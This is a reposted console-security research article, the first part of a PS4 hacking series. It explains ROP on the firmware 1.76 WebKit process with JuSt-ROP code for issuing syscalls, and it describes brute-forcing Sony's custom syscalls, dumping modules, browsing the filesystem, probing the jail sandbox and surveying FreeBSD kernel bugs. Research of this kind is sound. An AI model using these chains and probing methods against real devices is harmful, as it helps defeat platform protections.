精华内容
下载资源
问答
  • Hacking the PS4, part 1

    万次阅读 2017-03-18 12:17:40
    Hacking the PS4, part 1Introduction to PS4’s security, and userland ROP From: Cturt Note: This article is part of a 3 part series: Hacking the PS4, part 1 - Introduction to PS4’s security, and ...

    Hacking the PS4, part 1

    Introduction to PS4’s security, and userland ROP

    From: Cturt


    Note: This article is part of a 3 part series:

    See also: Analysis of sys_dynlib_prepare_dlclose PS4 kernel heap overflow

    Introduction

    Since there haven’t been any major public announcements regarding PS4 hacking for a long time now, I wanted to explain a bit about how far PS4 hacking has come, and what is preventing further progression.

    I will explain some security concepts that generally apply to all modern systems, and the discoveries that I have made from running ROP tests on my PS4.

    The goal of this series will be to present a full chain of exploits to ultimately gain kernel code execution on the PS4 by just visiting a web page on the Internet Browser.

    If you are not particularly familiar with exploitation, you should read my article about exploiting DS games through stack smash vulnerabilities in save files first.

    You may download my complete setup here to run these tests yourself; it is currently for firmware 1.76 only. If you are on an older firmware and wish to update to 1.76, you may download the 1.76 PUP file and update via USB.

    Background information about the PS4

    As you probably know the PS4 features a custom AMD x86-64 CPU (8 cores), and there are loads of research available for this CPU architecture, even if this specific version might deviate slightly from known standards. For example, PFLA (Page Fault Liberation Army) released a proof of concept implementing a complete Turing machine using only page faults and the x86 MMU during the 29C3 congress, check their awesome video over at YouTube. Also interesting if you are trying to run code within a virtual machine and want to execute instructions on the host CPU.

    As well as having a well documented CPU architecture, much of the software used in the PS4 is open source.

    Most notably, the PS4’s Orbis OS is based on FreeBSD (9.0), just like the PS3’s OS was (with parts of NetBSD as well); and includes a wide variety of additional open source software as well, such as Mono VM, and WebKit.

    WebKit entry point

    WebKit is the open source layout engine which renders web pages in the browsers for iOS, Wii U, 3DS, PS Vita, and the PS4.

    Although so widely used and mature, WebKit does have its share of vulnerabilities; you can learn about many of them by reading Pwn2Own write-ups.

    In particular, the browser in PS4 firmware 1.76 uses a version of WebKit which is vulnerable to CVE-2012-3748, a heap-based buffer overflow in the JSArray::sort(...) method.

    In 2014 nas and Proxima announced that they had successfully been able to port an exploit using this vulnerability, originally written for Mac OS X Safari, to the PS4’s internet browser, and released the PoC code publicly as the first entry point into hacking the PS4.

    This gives us arbitrary read and write access to everything the WebKit process can read and write to, which can be used to dump modules, and overwrite return addresses on the stack, letting us control the instruction pointer register (rip) to achieve ROP execution.

    Since then, many other vulnerabilities have been found in WebKit, which could probably be used as an entry point for later firmwares of the PS4, but as of writing, no one has ported any of these exploits to the PS4 publicly.

    If you have never signed into PSN, your PS4 won’t be able to open the Internet Browser, however you can go to “Settings”, and then “User’s Guide” to open a limited web browser view which you can control the contents of with a proxy.

    What is ROP?

    Unlike in primitive devices like the DS, the PS4 has a kernel which controls the properties of different areas of memory. Pages of memory which are marked as executable cannot be overwritten, and pages of memory which are marked as writable cannot be executed; this is known as Data Execution Prevention (DEP).

    This means that we can’t just copy a payload into memory and execute it. However, we can execute code that is already loaded into memory and marked as executable.

    It wouldn’t be very useful to jump to a single address if we can’t write our own code to that address, so we use ROP.

    Return-Oriented Programming (ROP) is just an extension to traditional stack smashing, but instead of overwriting only a single value which rip will jump to, we can chain together many different addresses, known as gadgets.

    A gadget is usually just a single desired instruction followed by a ret.

    In x86_64 assembly, when a ret instruction is reached, a 64 bit value is popped off the stack and rip jumps to it; since we can control the stack, we can make every ret instruction jump to the next desired gadget.

    For example, from 0x80000 may contains instructions:

    mov rax, 0
    ret

    And from 0x90000 may contain instructions:

    mov rbx, 0
    ret

    If we overwrite a return address on the stack to contain 0x80000 followed by 0x90000, then as soon as the first ret instruction is reached execution will jump to mov rax, 0, and immediately afterwards, the next ret instruction will pop 0x90000 off the stack and jump to mov rbx, 0.

    Effectively this chain will set both rax and rbx to 0, just as if we had written the code into a single location and executed it from there.

    ROP chains aren’t just limited to a list of addresses though; assuming that from 0xa0000 contains these instructions:

    pop rax
    ret

    We can set the first item in the chain to 0xa0000 and the next item to any desired value for rax.

    Gadgets also don’t have to end in a ret instruction; we can use gadgets ending in a jmp:

    add rax, 8
    jmp rcx

    By making rcx point to a ret instruction, the chain will continue as normal:

    chain.add("pop rcx", "ret");
    chain.add("add rax, 8; jmp rcx");

    Sometimes you won’t be able to find the exact gadget that you need on its own, but with other instructions after it. For example, if you want to set r8 to something, but only have this gadget, you will have to set r9 to some dummy value:

    pop r8
    pop r9
    ret

    Although you may have to be creative with how you write ROP chains, it is generally accepted that within a sufficiently large enough code dump, there will be enough gadgets for Turing-complete functionality; this makes ROP a viable method of defeating DEP.

    Finding gadgets

    Think of ROP as writing a new chapter to a book, using only words that have appeared at the end of sentences in the previous chapters.

    It’s obvious from the structure of most sentences that we probably won’t be able to find words like ‘and’ or ‘but’ appearing at the end of any sentences, but we will need these connectives in order to write anything meaningful.

    It is quite possible however, that a sentence has ended with ‘sand’. Although the author only ever intended for the word to be read from the ‘s’, if we start reading from the ‘a’, it will appear as an entirely different word by coincidence, ‘and’.

    These principles also apply to ROP.

    Since almost all functions are structured with a prologue and epilogue:

    ; Save registers
    push    rbp
    mov     rbp, rsp
    push    r15
    push    r14
    push    r13
    push    r12
    push    rbx
    sub     rsp, 18h
    
    ; Function body
    
    ; Restore registers
    add     rsp, 18h
    pop     rbx
    pop     r12
    pop     r13
    pop     r14
    pop     r15
    pop     rbp
    ret

    You’d expect to only be able to find pop gadgets, or more rarely, something like xor rax, rax to set the return value to 0 before returning.

    Having a comparison like:

    cmp [rax], r12
    ret

    Wouldn’t make any sense since the result of the comparison isn’t used by the function. However, there is still a possibility that we can find gadgets like these.

    x86_64 instructions are similar to words in that they have variable lengths, and can mean something entirely different depending on where decoding starts.

    The x86_64 architecture is a variable-length CISC instruction set. Return-oriented programming on the x86_64 takes advantage of the fact that the instruction set is very “dense”, that is, any random sequence of bytes is likely to be interpretable as some valid set of x86_64 instructions.

    To demonstrate this, take a look at the end of this function from the WebKit module:

    000000000052BE0D                 mov     eax, [rdx+8]
    000000000052BE10                 mov     [rsi+10h], eax
    000000000052BE13                 or      byte ptr [rsi+39h], 20h
    000000000052BE17                 ret

    Now take a look at what the code looks like if we start decoding from 0x52be14:

    000000000052BE14                 cmp     [rax], r12
    000000000052BE17                 ret

    Even though this code was never intended to be executed, it is within an area of memory which has been marked as executable, so it is perfectly valid to use as a gadget.

    Of course, it would be incredibily time consuming to look at every possible way of interpreting code before every single ret instruction manually; and that’s why tools exist to do this for you. The one which I use to search for ROP gadgets is rp++; to generate a text file filled with gadgets, just use:

    rp-win-x64 -f mod14.bin --raw=x64 --rop=1 --unique > mod14.txt

    General protection faults

    If we do perform an access violation, such as by trying to execute a non-executable page of memory, or by trying to write to a non-writable page of memory, a general protection fault, or more specifically in this instance, a segmentation fault, will occur.

    For example, trying to execute code on the stack, which is mapped as read and write only:

    setU8to(chain.data + 0, 0xeb);
    setU8to(chain.data + 1, 0xfe);
    
    chain.add(chain.data);

    And trying to write to code, which is mapped as read and execute only:

    setU8to(moduleBases[webkit], 0);

    If a general protection fault occurs, a message saying “There is not enough free system memory” will appear, and the page will fail to load:

    This message will also be displayed for other hard faults, such as division by 0, or execution of an invalid instruction or unimplemented system call, but most commonly it will be encountered by performing a segmentation fault.

    ASLR

    Address Space Layout Randomization (ASLR) is a security technique which causes the base addresses of modules to be different every time you start the PS4.

    It has been reported to me that very old firmwares (1.05) don’t have ASLR enabled, but it was introduced sometime before firmware 1.70. Note that kernel ASLR is not enabled (for firmwares 1.76 and lower at least), which will be proved later in the article.

    For most exploits ASLR would be a problem because if you don’t know the addresses of the gadgets in memory, you would have no idea what to write to the stack.

    Luckily for us, we aren’t limited to just writing static ROP chains. We can use JavaScript to read the modules table, which will tell us the base addresses of all loaded modules. Using these bases, we can then calculate the addresses of all our gadgets before we trigger ROP execution, defeating ASLR.

    The modules table also includes the filenames of the modules:

    • WebProcess.self
    • libkernel.sprx
    • libSceLibcInternal.sprx
    • libSceSysmodule.sprx
    • libSceNet.sprx
    • libSceNetCtl.sprx
    • libSceIpmi.sprx
    • libSceMbus.sprx
    • libSceRegMgr.sprx
    • libSceRtc.sprx
    • libScePad.sprx
    • libSceVideoOut.sprx
    • libScePigletv2VSH.sprx
    • libSceOrbisCompat.sprx
    • libSceWebKit2.sprx
    • libSceSysCore.sprx
    • libSceSsl.sprx
    • libSceVideoCoreServerInterface.sprx
    • libSceSystemService.sprx
    • libSceCompositeExt.sprx

    Although the PS4 predominantly uses the [**S**igned] **P**PU **R**elocatable E**x**ecutable ([S]PRX) format for modules, some string references to [**S**igned] **E**xecutable and **L**inking **F**ormat ([S]ELF) object files can also be found in the libSceSysmodule.sprx dump, such as bdj.elf, web_core.elf and orbis-jsc-compiler.self. This combination of modules and objects is similar to what is used in the PSP and PS3.

    You can view a complete list of all modules available (not just those loaded by the browser) in libSceSysmodule.sprx. We can load and dump some of these through several of Sony’s custom system calls, which will be explained later in this article.

    JuSt-ROP

    Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a traditional, static buffer overflow attack.

    As well as being necessary to defeat ASLR, JavaScript also lets us read the user agent of the browser, and provide different ROP chains for different browser versions, giving our exploit a greater range of compatibility.

    We can even use JavaScript to read the memory at our gadgets’ addresses to check that they are correct, giving us almost perfect reliability. Theoretically, you could take this even further by writing a script to dynamically find ROP gadgets and then build ROP chains on the fly.

    Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.

    I created a JavaScript framework for writing ROP chains, JuSt-ROP, for this very reason.

    JavaScript caveats

    JavaScript represents numbers using the IEEE-754 double-precision (64 bit) format. This provides us with 53 bit precision, meaning that it isn’t possible to represent every 64 bit value, approximations will have to be used for some.

    If you just need to set a 64 bit value to something low, like 256, then setU64to will be fine.

    But for situations in which you need to write a buffer or struct of data, there is the possibility that certain bytes will be written incorrectly if it has been written in 64 bit chunks.

    Instead, you should write data in 32 bit chunks (remembering that the PS4 is little endian), to ensure that every byte is exact.

    System calls

    Interestingly, the PS4 uses the same calling convention as Linux and MS-DOS for system calls, with arguments stored in registers, rather than the traditional UNIX way (which FreeBSD uses by default), with arguments stored in the stack:

    • rax - System call number
    • rdi - Argument 1
    • rsi - Argument 2
    • rdx - Argument 3
    • r10 - Argument 4
    • r8 - Argument 5
    • r9 - Argument 6

    We can try to perform any system call with the following JuSt-ROP method:

    this.syscall = function(name, systemCallNumber, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("syscall " + name);
    
        this.add("pop rax", systemCallNumber);
        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add("mov r10, rcx; syscall");
    }

    Just make sure to set the stack base to some free memory beforehand:

    this.add("pop rbp", stackBase + returnAddress + 0x1400);

    Using system calls can tell us a huge amount about the PS4 kernel. Not only that, but using system calls is most likely the only way that we can interact with the kernel, and thus potentially trigger a kernel exploit.

    If you are reverse engineering modules to identify some of Sony’s custom system calls, you may come across an alternative calling convention:

    Sometimes Sony performs system calls through regular system call 0 (which usually does nothing in FreeBSD), with the first argument (rdi) controlling which system call should be executed:

    • rax - 0
    • rdi - System call number
    • rsi - Argument 1
    • rdx - Argument 2
    • r10 - Argument 3
    • r8 - Argument 4
    • r9 - Argument 5

    It is likely that Sony did this to have easy compatibility with the function calling convention. For example:

    .global syscall
    syscall:
        xor     rax, rax
        mov     r10, rcx
        syscall
        ret
    

    Using this, they can perform system calls from C using the function calling convention:

    int syscall();
    
    int getpid(void) {
        return syscall(20);
    }

    When writing ROP chains, we can use either convention:

    // Both will get the current process ID:
    chain.syscall("getpid", 20);
    chain.syscall("getpid", 0, 20);

    It’s good to be aware of this, because we can use whichever one is more convenient for the gadgets that are available.

    getpid

    Just by using system call 20, getpid(void), we can learn a lot about the kernel.

    The very fact that this system call works at all tells us that Sony didn’t bother mixing up the system call numbers as a means of security through obscurity (under the BSD license they could have done this without releasing the new system call numbers).

    So, we automatically have a list of system calls in the PS4 kernel to try.

    Secondly, by calling getpid(), restarting the browser, and calling it again, we get a return value 2 higher than the previous value.

    This tells us that the Internet Browser app actually consists of 2 separate processes: the WebKit core (which we take over), that handles parsing HTML and CSS, decoding images, and executing JavaScript for example, and another one to handle everything else: displaying graphics, receiving controller input, managing history and bookmarks, etc.

    Also, although FreeBSD has supported PID randomisation since 4.0, sequential PID allocation is the default behaviour.

    The fact that PID allocation is set to the default behaviour indicates that Sony likely didn’t bother adding any additional security enhancements such as those encouraged by projects like HardenedBSD, other than userland ASLR.

    How many custom system calls are there?

    The last standard FreeBSD 9 system call is wait6, number 532; anything higher than this must be a custom Sony system call.

    Invoking most of Sony’s custom system calls without the correct arguments will return error 0x16, "Invalid argument"; however, any compatibility or unimplemented system calls will report the “There is not enough free system memory” error.

    Through trial and error, I have found that system call number 617 is the last Sony system call, anything higher is unimplemented.

    From this, we can conclude that there are 85 custom Sony system calls in the PS4’s kernel (617 - 532).

    libkernel.sprx

    To identify how custom system calls are used by libkernel, you must first remember that it is just a modification of the standard FreeBSD 9.0 libraries.

    Here’s an extract of _libpthread_init from thr_init.c:

    /*
     * Check for the special case of this process running as
     * or in place of init as pid = 1:
     */
    if ((_thr_pid = getpid()) == 1) {
        /*
         * Setup a new session for this process which is
         * assumed to be running as root.
         */
        if (setsid() == -1)
            PANIC("Can't set session ID");
        if (revoke(_PATH_CONSOLE) != 0)
            PANIC("Can't revoke console");
        if ((fd = __sys_open(_PATH_CONSOLE, O_RDWR)) < 0)
            PANIC("Can't open console");
        if (setlogin("root") == -1)
            PANIC("Can't set login to root");
        if (_ioctl(fd, TIOCSCTTY, (char *) NULL) == -1)
            PANIC("Can't set controlling terminal");
    }

    The same function can be found at offset 0x215F0 from libkernel.sprx. This is how the above extract looks from within a libkernel dump:

    call    getpid
    mov     cs:dword_5B638, eax
    cmp     eax, 1
    jnz     short loc_2169F
    
    call    setsid
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A0C
    
    lea     rdi, aDevConsole ; "/dev/console"
    call    revoke
    test    eax, eax
    jnz     loc_21A24
    
    lea     rdi, aDevConsole ; "/dev/console"
    mov     esi, 2
    xor     al, al
    call    open
    
    mov     r14d, eax
    test    r14d, r14d
    js      loc_21A3C
    lea     rdi, aRoot       ; "root"
    call    setlogin
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A54
    
    mov     edi, r14d
    mov     esi, 20007461h
    xor     edx, edx
    xor     al, al
    call    ioctl
    cmp     eax, 0FFFFFFFFh
    jz      loc_21A6C

    Reversing module dumps to analyse system calls

    libkernel isn’t completely open source though; there’s also a lot of custom code which can help disclose some of Sony’s system calls.

    Although this process will vary depending on the system call you are looking up; for some, it is fairly easy to get a basic understanding of the arguments that are passed to it.

    The system call wrapper will be declared somewhere in libkernel.sprx, and will almost always follow this template:

    000000000000DB70 syscall_601     proc near
    000000000000DB70                 mov     rax, 259h
    000000000000DB77                 mov     r10, rcx
    000000000000DB7A                 syscall
    000000000000DB7C                 jb      short error
    000000000000DB7E                 retn
    000000000000DB7F
    000000000000DB7F error:
    000000000000DB7F                 lea     rcx, sub_DF60
    000000000000DB86                 jmp     rcx
    000000000000DB86 syscall_601     endp

    Note that the mov r10, rcx instruction doesn’t necessarily mean that the system call takes at least 4 arguments; all system call wrappers have it, even those that take no arguments, such as getpid.

    Once you’ve found the wrapper, you can look up xrefs to it:

    0000000000011D50                 mov     edi, 10h
    0000000000011D55                 xor     esi, esi
    0000000000011D57                 mov     edx, 1
    0000000000011D5C                 call    syscall_601
    0000000000011D61                 test    eax, eax
    0000000000011D63                 jz      short loc_11D6A

    It’s good to look up several of these, just to make sure that the registers weren’t modified for something unrelated:

    0000000000011A28                 mov     edi, 9
    0000000000011A2D                 xor     esi, esi
    0000000000011A2F                 xor     edx, edx
    0000000000011A31                 call    syscall_601
    0000000000011A36                 test    eax, eax
    0000000000011A38                 jz      short loc_11A3F

    Consistently, the first three registers of the system call convention (rdi, rsi, and rdx) are modified before invoking the call, so we can conclude with reasonable confidence that it takes 3 arguments.

    For clarity, this is how we would replicate the calls in JuSt-ROP:

    chain.syscall("unknown", 601, 0x10, 0, 1);
    chain.syscall("unknown", 601, 9, 0, 0);

    As with most system calls, it will return 0 on success, as seen by the jz conditional after testing the return value.

    Looking up anything beyond than the amount of arguments will require a much more in-depth analysis of the code before and after the call to understand the context, but this should help you get started.

    Brute forcing system calls

    Although reverse engineering module dumps is the most reliable way to identify system calls, some aren’t referenced at all in the dumps we have so we will need to analyse them blindly.

    If we guess that a certain system call might take a particular set of arguments, we can brute force all system calls which return a certain value (0 for success) with the arguments that we chose, and ignore all which returned an error.

    We can also pass 0s for all arguments, and brute force all system calls which return useful errors such as 0xe, "Bad address", which would indicate that they take at least one pointer.

    Firstly, we will need to execute the ROP chain as soon as the page loads. We can do this by attaching our function to the body element’s onload:

    <body onload="exploit()">

    Next we will need to perform a specific system call depending on an HTTP GET value. Although this can be done with JavaScript, I will demonstrate how to do this using PHP for simplicity:

    var Sony = 533;
    chain.syscall("Sony system call", Sony + <?php print($_GET["b"]); ?>, 0, 0, 0, 0, 0, 0);
    chain.write_rax_ToVariable(0);

    Once the system call has executed, we can check the return value, and if it isn’t interesting, redirect the page to the next system call:

    if(chain.getVariable(0) == 0x16) window.location.assign("index.php?b=" + (<?php print($_GET["b"]); ?> + 1).toString());

    Running the page with ?b=0 appended to the end will start the brute force from the first Sony system call.

    Although this method requires a lot of experimentation, by passing different values to some of the system calls found by brute forcing and analysing the new return values, there are a few system calls which you should be able to partially identify.

    System call 538

    As an example, I’ll take a look at system call 538, without relying on any module dumps.

    These are the return values depending on what is passed as the first argument:

    • 0 - 0x16, "Invalid argument"
    • 1 - 0xe, "Bad address"
    • Pointer to 0s - 0x64 initially, but each time the page is refreshed this value increases by 1

    Other potential arguments to try would be PID, thread ID, and file descriptor.

    Although most system calls will return 0 on success, due to the nature of the return value increasing after each time it is called, it seems like it is allocating a resource number, such as a file descriptor.

    The next thing to do would be to look at the data before and after performing the system call, to see if it has been written to.

    Since there is no change in the data, we can assume that it is an input for now.

    I then tried passing a long string as the first argument. You should always try this with every input you find because there is the possibility of discovering a buffer overflow.

    writeString(chain.data, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

    The return value for this is 0x3f, ENAMETOOLONG. Unfortunately it seems that this system call correctly limits the name (32 bytes including NULL truncator), but it does tell us that it is expecting a string, rather than a struct.

    We now have a few possibilities for what this system call is doing, the most obvious being something related to the filesystem (such as a custom mkdir or open), but this doesn’t seem particularly likely seeing as a resource was allocated even before we wrote any data to the pointer.

    To test whether the first parameter is a path, we can break it up with multiple / characters to see if this allows for a longer string:

    writeString(chain.data, "aaaaaaaaaa/aaaaaaaaaa/aaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

    Since this also returns 0x3f, we can assume that the first argument isn’t a path; it is a name for something that gets allocated a sequential identifier.

    After analysing some more system calls, I found that the following all shared this exact same behaviour:

    • 533
    • 538
    • 557
    • 574
    • 580

    From the information that we have so far, it is almost impossible to pinpoint exactly what these system calls do, but as you run more tests, further information will slowly be revealed.

    To save you some time, system call 538 is allocating an event flag (and it doesn’t just take a name).

    Using general knowledge of how a kernel works, you can guess, and then verify, what the system calls are allocating (semaphores, mutexes, etc).

    Dumping additional modules

    We can dump additional modules by following these stages:

    • Load the module
    • Get the module’s base address
    • Dump the module

    I’ve extracted and posted a list of all module names on psdevwiki.

    To load a module we will need to use the sceSysmoduleLoadModule function from libSceSysmodule.sprx + 0x1850. The first parameter is the module ID to load, and the other 3 should just be passed 0.

    The following JuSt-ROP method can be used to perform a function call:

    this.call = function(name, module, address, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("call " + name);
    
        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add(module_bases[module] + address);
    }

    So, to load libSceAvSetting.sprx (0xb):

    chain.call("sceSysmoduleLoadModule", libSysmodule, 0x1850, 0xb, 0, 0, 0);

    Unfortunately, a fault will be triggered when trying to load certain modules; this is because the sceSysmoduleLoadModule function doesn’t load dependencies, so you will need to manually load them first.

    Like most system calls, this should return 0 on success. To see the loaded module ID that was allocated, we can use one of Sony’s custom system calls, number 592, to get a list of currently loaded modules:

    var countAddress = chain.data;
    var modulesAddress = chain.data + 8;
    
    // System call 592, getLoadedModules(int *destinationModuleHandles, int max, int *count);
    chain.syscall("getLoadedModules", 592, modulesAddress, 256, countAddress);
    
    chain.execute(function() {
        var count = getU64from(countAddress);
        for(var index = 0; index < count; index++) {
            logAdd("Module handle: 0x" + getU32from(modulesAddress + index * 4).toString(16));
        }
    });

    Running this without loading any additional modules will produce the following list:

    0x0, 0x1, 0x2, 0xc, 0xe, 0xf, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1e, 0x37, 0x59

    But if we run it after loading module 0xb, we will see an additional entry, 0x65. Remember that module ID is not the same as loaded module handle.

    We can now use another of Sony’s custom system calls, number 593, which takes a module handle and a buffer, and fills the buffer with information about the loaded module, including its base address. Since the next available handle is always 0x65, we can hardcode this value into our chain, rather than having to store the result from the module list.

    The buffer must start with the size of the struct that should be returned, otherwise error 0x16 will be returned, "Invalid argument":

    setU64to(moduleInfoAddress, 0x160);
    chain.syscall("getModuleInfo", 593, 0x65, moduleInfoAddress);
    
    chain.execute(function() {
        logAdd(hexDump(moduleInfoAddress, 0x160));
    });

    It will return 0 upon success, and fill the buffer with a struct which can be read like so:

    var name = readString(moduleInfoAddress + 0x8);
    var codeBase = getU64from(moduleInfoAddress + 0x108);
    var codeSize = getU32from(moduleInfoAddress + 0x110);
    var dataBase = getU64from(moduleInfoAddress + 0x118);
    var dataSize = getU32from(moduleInfoAddress + 0x120);

    We now have everything we need to dump the module!

    dump(codeBase, codeSize + dataSize);

    There is another Sony system call, number 608, which works in a similar way to 593, but provides slightly different information about the loaded module:

    setU64to(moduleInfoAddress, 0x1a8);
    chain.syscall("getDifferentModuleInfo", 608, 0x65, 0, moduleInfoAddress);
    logAdd(hexDump(moduleInfoAddress, 0x1a8));

    It’s not clear what this information is.

    Browsing the filesystem

    The PS4 uses the standard FreeBSD 9.0 system calls for reading files and directories.

    However, whilst using read for some directories such as /dev/ will work, others, such as / will fail.

    I’m not sure why this is, but if we use getdents instead of read for directories, it will work much more reliably:

    writeString(chain.data, "/dev/");
    chain.syscall("open", 5, chain.data, 0, 0);
    chain.write_rax_ToVariable(0);
    
    chain.read_rdi_FromVariable(0);
    chain.syscall("getdents", 272, undefined, chain.data + 0x10, 1028);

    This is the resultant memory:

    0000010: 0700 0000 1000 0205 6469 7073 7700 0000  ........dipsw...
    0000020: 0800 0000 1000 0204 6e75 6c6c 0000 0000  ........null....
    0000030: 0900 0000 1000 0204 7a65 726f 0000 0000  ........zero....
    0000040: 0301 0000 0c00 0402 6664 0000 0b00 0000  ........fd......
    0000050: 1000 0a05 7374 6469 6e00 0000 0d00 0000  ....stdin.......
    0000060: 1000 0a06 7374 646f 7574 0000 0f00 0000  ....stdout......
    0000070: 1000 0a06 7374 6465 7272 0000 1000 0000  ....stderr......
    0000080: 1000 0205 646d 656d 3000 0000 1100 0000  ....dmem0.......
    0000090: 1000 0205 646d 656d 3100 0000 1300 0000  ....dmem1.......
    00000a0: 1000 0206 7261 6e64 6f6d 0000 1400 0000  ....random......
    00000b0: 1000 0a07 7572 616e 646f 6d00 1600 0000  ....urandom.....
    00000c0: 1400 020b 6465 6369 5f73 7464 6f75 7400  ....deci_stdout.
    00000d0: 1700 0000 1400 020b 6465 6369 5f73 7464  ........deci_std
    00000e0: 6572 7200 1800 0000 1400 0209 6465 6369  err.........deci
    00000f0: 5f74 7479 3200 0000 1900 0000 1400 0209  _tty2...........
    0000100: 6465 6369 5f74 7479 3300 0000 1a00 0000  deci_tty3.......
    0000110: 1400 0209 6465 6369 5f74 7479 3400 0000  ....deci_tty4...
    0000120: 1b00 0000 1400 0209 6465 6369 5f74 7479  ........deci_tty
    0000130: 3500 0000 1c00 0000 1400 0209 6465 6369  5...........deci
    0000140: 5f74 7479 3600 0000 1d00 0000 1400 0209  _tty6...........
    0000150: 6465 6369 5f74 7479 3700 0000 1e00 0000  deci_tty7.......
    0000160: 1400 020a 6465 6369 5f74 7479 6130 0000  ....deci_ttya0..
    0000170: 1f00 0000 1400 020a 6465 6369 5f74 7479  ........deci_tty
    0000180: 6230 0000 2000 0000 1400 020a 6465 6369  b0.. .......deci
    0000190: 5f74 7479 6330 0000 2200 0000 1400 020a  _ttyc0..".......
    00001a0: 6465 6369 5f73 7464 696e 0000 2300 0000  deci_stdin..#...
    00001b0: 0c00 0203 6270 6600 2400 0000 1000 0a04  ....bpf.$.......
    00001c0: 6270 6630 0000 0000 2900 0000 0c00 0203  bpf0....).......
    00001d0: 6869 6400 2c00 0000 1400 0208 7363 655f  hid.,.......sce_
    00001e0: 7a6c 6962 0000 0000 2e00 0000 1000 0204  zlib............
    00001f0: 6374 7479 0000 0000 3400 0000 0c00 0202  ctty....4.......
    0000200: 6763 0000 3900 0000 0c00 0203 6463 6500  gc..9.......dce.
    0000210: 3a00 0000 1000 0205 6462 6767 6300 0000  :.......dbggc...
    0000220: 3e00 0000 0c00 0203 616a 6d00 4100 0000  >.......ajm.A...
    0000230: 0c00 0203 7576 6400 4200 0000 0c00 0203  ....uvd.B.......
    0000240: 7663 6500 4500 0000 1800 020d 6e6f 7469  vce.E.......noti
    0000250: 6669 6361 7469 6f6e 3000 0000 4600 0000  fication0...F...
    0000260: 1800 020d 6e6f 7469 6669 6361 7469 6f6e  ....notification
    0000270: 3100 0000 5000 0000 1000 0206 7573 6263  1...P.......usbc
    0000280: 746c 0000 5600 0000 1000 0206 6361 6d65  tl..V.......came
    0000290: 7261 0000 8500 0000 0c00 0203 726e 6700  ra..........rng.
    00002a0: 0701 0000 0c00 0403 7573 6200 c900 0000  ........usb.....
    00002b0: 1000 0a07 7567 656e 302e 3400 0000 0000  ....ugen0.4.....
    00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................

    You can read some of these devices, for example: reading /dev/urandom will fill the memory with random data.

    It is also possible to parse this memory to create a clean list of entries; look at browser.html in the repository for a complete file browser:

    Unfortunately, due to sandboxing we don’t have complete access to the file system. Trying to read files and directories that do exist but are restricted will give you error 2, ENOENT, "No such file or directory".

    We do have access to a lot of interesting stuff though including encrypted save data, trophies, and account information. I will go over more of the filesystem in my next article.

    Sandboxing

    As well as file related system calls failing for certain paths, there are other reasons for a system call to fail.

    Most commonly, a disallowed system call will just return error 1, EPERM, "Operation not permitted"; such as trying to use ptrace, but other system calls may fail for different reasons:

    Compatibilty system calls are disabled. If you are trying to call mmap for example, you must use system call number 477, not 71 or 197; otherwise a segfault will be triggered.

    Other system calls such as exit will also trigger a fault:

    chain.syscall("exit", 1, 0);

    Trying to create an SCTP socket will return error 0x2b, EPROTONOSUPPORT, indicating that SCTP sockets have been disabled in the PS4 kernel:

    //int socket(int domain, int type, int protocol);
    //socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    chain.syscall("socket", 97, 2, 1, 132);

    And although calling mmap with PROT_READ | PROT_WRITE | PROT_EXEC will return a valid pointer, the PROT_EXEC flag is ignored. Reading its protection will return 3 (RW), and any attempt to execute the memory will trigger a segfault:

    chain.syscall("mmap", 477, 0, 4096, 1 | 2 | 4, 4096, -1, 0);
    chain.write_rax_ToVariable(0);
    chain.read_rdi_FromVariable(0);
    chain.add("pop rax", 0xfeeb);
    chain.add("mov [rdi], rax");
    chain.add("mov rax, rdi");
    chain.add("jmp rax");

    The list of open source software used in the PS4 doesn’t list any kind of sandboxing software like Capsicum, so the PS4 must use either pure FreeBSD jails, or some kind of custom, proprietary, sandboxing system (unlikely).

    Jails

    We can prove the existence of FreeBSD jails being actively used in the PS4’s kernel through the auditon system call being impossible to execute within a jailed environment:

    chain.syscall("auditon", 446, 0, 0, 0);

    The first thing the auditon system call does is check jailed here, and if so, return ENOSYS:

    if (jailed(td->td_ucred))
        return (ENOSYS);

    Otherwise the system call would most likely return EPERM from the mac_system_check_auditon here:

    error = mac_system_check_auditon(td->td_ucred, uap->cmd);
    if (error)
        return (error);

    Or from the priv_check here:

    error = priv_check(td, PRIV_AUDIT_CONTROL);
    if (error)
        return (error);

    The absolute furthest that the system call could reach would be immediately after the priv_check, here, before returning EINVAL due to the length argument being 0:

    if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata)))
        return (EINVAL);

    Since mac_system_check_auditon and priv_check will never return ENOSYS, having the jailed check pass is the only way ENOSYS could be returned.

    When executing the chain, ENOSYS is returned (0x48).

    This tells us that whatever sandbox system the PS4 uses is at least based on jails because the jailed check passes.

    FreeBSD 9.0 kernel exploits

    Before trying to look for new vulnerabilities in the FreeBSD 9.0 kernel source code, we should first check whether any of the kernel vulnerabilities already found could be used on the PS4.

    We can immediately dismiss some of these for obvious reasons:

    However, there are some smaller vulnerabilites, which could lead to something:

    getlogin

    One vulnerability which looks easy to try is using the getlogin system call to leak a small amount of kernel memory.

